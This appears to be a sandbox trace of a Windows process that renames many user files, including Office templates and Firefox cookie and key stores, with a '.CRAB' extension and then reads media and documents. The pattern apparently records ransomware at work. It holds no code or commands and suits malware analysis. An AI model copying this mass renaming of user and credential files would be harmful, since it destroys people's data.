Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835232[[fn=Text Cover (Student Report Blue design)]].docx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835232[[fn=Text Cover (Student Report Blue design)]].docx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835264[[fn=Cover Page (Annual Report Red and Black design)]].docx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835264[[fn=Cover Page (Annual Report Red and Black design)]].docx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835265[[fn=Cover Page (Annual Report Timeless design)]].docx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835265[[fn=Cover Page (Annual Report Timeless design)]].docx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835266[[fn=Cover Letter (Chronological Resume Simple design)]].docx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835266[[fn=Cover Letter (Chronological Resume Simple design)]].docx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835267[[fn=Cover with Logo (Annual Report Red and Black design)]].docx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835267[[fn=Cover with Logo (Annual Report Red and Black design)]].docx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835268[[fn=Photo Cover (Student Report Blue design)]].docx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835268[[fn=Photo Cover (Student Report Blue design)]].docx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835269[[fn=Photo Cover with TOC (Student Report blue design)]].docx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835269[[fn=Photo Cover with TOC (Student Report blue design)]].docx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835270[[fn=Photo Sidebar (Annual Report Red and Black design)]].docx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835270[[fn=Photo Sidebar (Annual Report Red and Black design)]].docx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835271[[fn=Sample Table (Annual Report Red and Black design)]].docx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835271[[fn=Sample Table (Annual Report Red and Black design)]].docx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835272[[fn=Sample Table (Annual Report Timeless design)]].docx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835272[[fn=Sample Table (Annual Report Timeless design)]].docx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02836362[[fn=Cover letter (Resume Timeless Design)]].docx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02836362[[fn=Cover letter (Resume Timeless Design)]].docx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998158[[fn=Element]].dotx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998158[[fn=Element]].dotx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998159[[fn=Insight]].dotx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998159[[fn=Insight]].dotx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Normal.dotm.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Normal.dotm True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Welcome to Word.dotx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Welcome to Word.dotx True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\addons.json.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\addons.json True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\addonStartup.json.lz4.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\addonStartup.json.lz4 True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\blocklist.xml.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\blocklist.xml True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\cert8.db.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\cert8.db True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\compatibility.ini.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\compatibility.ini True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\containers.json.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\containers.json True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\content-prefs.sqlite.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\content-prefs.sqlite True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\cookies.sqlite.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\cookies.sqlite True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\2017-08\1503651440860.2d520ad0-8005-4317-b4fd-571af846ed8d.new-profile.jsonlz4.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\2017-08\1503651440860.2d520ad0-8005-4317-b4fd-571af846ed8d.new-profile.jsonlz4 True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\2017-08\1503651441015.321b9820-ddf0-4472-8833-27c2104c93fa.main.jsonlz4.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\2017-08\1503651441015.321b9820-ddf0-4472-8833-27c2104c93fa.main.jsonlz4 True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\2017-08\1503651456011.5f95b583-d699-497d-975d-4dba64e21259.main.jsonlz4.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\2017-08\1503651456011.5f95b583-d699-497d-975d-4dba64e21259.main.jsonlz4 True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\session-state.json.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\session-state.json True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\state.json.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\state.json True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\extensions.json.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\extensions.json True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\favicons.sqlite.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\favicons.sqlite True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-gmpopenh264\1.6\gmpopenh264.info.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-gmpopenh264\1.6\gmpopenh264.info True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\1.4.8.903\LICENSE.txt.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\1.4.8.903\LICENSE.txt True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\1.4.8.903\manifest.json.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\1.4.8.903\manifest.json True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\1.4.8.903\widevinecdm.dll.lib.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\1.4.8.903\widevinecdm.dll.lib True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\handlers.json.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\handlers.json True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\key3.db.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\key3.db True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\permissions.sqlite.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\permissions.sqlite True 1
Fn
Read C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe size = 285192, size_out = 285192 True 1
Fn
Data
Read - size = 4096, size_out = 101 True 1
Fn
Data
Read C:\$Recycle.Bin\S-1-5-21-2172869166-1497266965-2109836178-1000\$IPEWI8I.TMP size = 1048576, size_out = 150 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\27YjI_tg_wmDvK-.gif size = 1048576, size_out = 2530 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\2KxNzGrrl.doc size = 1048576, size_out = 76537 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\57VfXi.wav size = 1048576, size_out = 27784 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\7y338WW30Khw_Kvdj.bmp size = 1048576, size_out = 94389 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\80nauBl1bcqQ.mp3 size = 1048576, size_out = 2043 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\9HQb6.gif size = 1048576, size_out = 34322 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\aD456ynae.png size = 1048576, size_out = 31408 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata size = 1048576, size_out = 7870 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl size = 1048576, size_out = 637 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl size = 1048576, size_out = 425 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_Acrobat12_Reader_3980e2e3-09b5-4737-a657-22675b06a39a_03db394c-1477-45d1-895c-00e42db7e723_0.rdy size = 1048576, size_out = 23372 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg size = 1048576, size_out = 216 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml size = 1048576, size_out = 18761 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\BC4CK.mp3 size = 1048576, size_out = 51502 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Cx 2hVTJNEPKc.mp3 size = 1048576, size_out = 38961 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\d 3OIHehyy3Jgx.mp4 size = 1048576, size_out = 89217 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Dz28gHwyj9-jVurMnBQV.ots size = 1048576, size_out = 99521 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\fezrNJYET8dXBnLxa.mp4 size = 1048576, size_out = 29747 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\FKoQ.odt size = 1048576, size_out = 86607 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\gfLne6ecA1jmfG6m8.mkv size = 1048576, size_out = 89244 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Im-Xi-TXJUjXU8gwjeAN.avi size = 1048576, size_out = 52416 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\iVmnctwjmS.swf size = 1048576, size_out = 100297 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\je8O8Wzi8buOk7-5Nx6.m4a size = 1048576, size_out = 8071 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\KdoskM.avi size = 1048576, size_out = 5554 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol size = 1048576, size_out = 506 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl size = 1048576, size_out = 333602 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL size = 1048576, size_out = 297017 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL size = 1048576, size_out = 268670 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL size = 1048576, size_out = 256358 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GostTitle.XSL size = 1048576, size_out = 251449 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl size = 1048576, size_out = 284802 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl size = 1048576, size_out = 294525 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\ISO690.XSL size = 1048576, size_out = 270642 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\ISO690Nmerical.XSL size = 1048576, size_out = 217578 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl size = 1048576, size_out = 255219 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\SIST02.XSL size = 1048576, size_out = 251336 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\TURABIAN.XSL size = 1048576, size_out = 344662 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx size = 1048576, size_out = 1048576 True 3
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx size = 1048576, size_out = 560327 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\MSO1033.acl size = 1048576, size_out = 37730 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\con2.LNK size = 1048576, size_out = 282 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\index.dat size = 1048576, size_out = 63 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\Templates.LNK size = 1048576, size_out = 1183 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\Outlook.srs size = 1048576, size_out = 2560 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\Outlook.xml size = 1048576, size_out = 2346 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml size = 1048576, size_out = 168 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Cashflow analysis.xltm size = 1048576, size_out = 380006 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02836342[[fn=Ion]].thmx size = 1048576, size_out = 1048576 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02836342[[fn=Ion]].thmx size = 1048576, size_out = 776190 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02892315[[fn=Wisp]].thmx size = 1048576, size_out = 787354 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02900688[[fn=Facet]].thmx size = 1048576, size_out = 738429 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02900771[[fn=Slice]].thmx size = 1048576, size_out = 864810 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090430[[fn=Banded]].thmx size = 1048576, size_out = 562113 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090434[[fn=Wood Type]].thmx size = 1048576, size_out = 1048576 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090434[[fn=Wood Type]].thmx size = 1048576, size_out = 601009 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457444[[fn=Basis]].thmx size = 1048576, size_out = 558035 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457464[[fn=Dividend]].thmx size = 1048576, size_out = 570901 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457475[[fn=Frame]].thmx size = 1048576, size_out = 523048 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457485[[fn=Mesh]].thmx size = 1048576, size_out = 1048576 True 2
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457485[[fn=Mesh]].thmx size = 1048576, size_out = 980900 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457491[[fn=Metropolitan]].thmx size = 1048576, size_out = 777647 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457496[[fn=Parallax]].thmx size = 1048576, size_out = 924687 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457503[[fn=Quotable]].thmx size = 1048576, size_out = 966946 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457510[[fn=Savon]].thmx size = 1048576, size_out = 1048576 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457510[[fn=Savon]].thmx size = 1048576, size_out = 155473 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457515[[fn=View]].thmx size = 1048576, size_out = 486596 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033917[[fn=Berlin]].thmx size = 1048576, size_out = 976001 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033919[[fn=Circuit]].thmx size = 1048576, size_out = 1048576 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033919[[fn=Circuit]].thmx size = 1048576, size_out = 415058 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033921[[fn=Damask]].thmx size = 1048576, size_out = 1048576 True 2
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033921[[fn=Damask]].thmx size = 1048576, size_out = 121791 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033925[[fn=Droplet]].thmx size = 1048576, size_out = 1048576 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033925[[fn=Droplet]].thmx size = 1048576, size_out = 702219 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033927[[fn=Main Event]].thmx size = 1048576, size_out = 1048576 True 2
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033927[[fn=Main Event]].thmx size = 1048576, size_out = 827085 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033929[[fn=Slate]].thmx size = 1048576, size_out = 1048576 True 2
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033929[[fn=Slate]].thmx size = 1048576, size_out = 259899 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033937[[fn=Vapor Trail]].thmx size = 1048576, size_out = 1048576 True 3
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033937[[fn=Vapor Trail]].thmx size = 1048576, size_out = 465596 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001103[[fn=Headlines]].thmx size = 1048576, size_out = 539609 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001104[[fn=Feathered]].thmx size = 1048576, size_out = 1048576 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001104[[fn=Feathered]].thmx size = 1048576, size_out = 1004500 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001105[[fn=Crop]].thmx size = 1048576, size_out = 536604 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001114[[fn=Gallery]].thmx size = 1048576, size_out = 1048576 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001114[[fn=Gallery]].thmx size = 1048576, size_out = 42909 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001115[[fn=Parcel]].thmx size = 1048576, size_out = 608122 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM16401371[[fn=Atlas]].thmx size = 1048576, size_out = 857650 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328884[[fn=architecture]].glox size = 1048576, size_out = 5783 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328893[[fn=BracketList]].glox size = 1048576, size_out = 4026 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328905[[fn=Chevron Accent]].glox size = 1048576, size_out = 4243 True 1
Fn
Data
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328908[[fn=Circle Process]].glox size = 1048576, size_out = 16806 True 1
Fn
Data
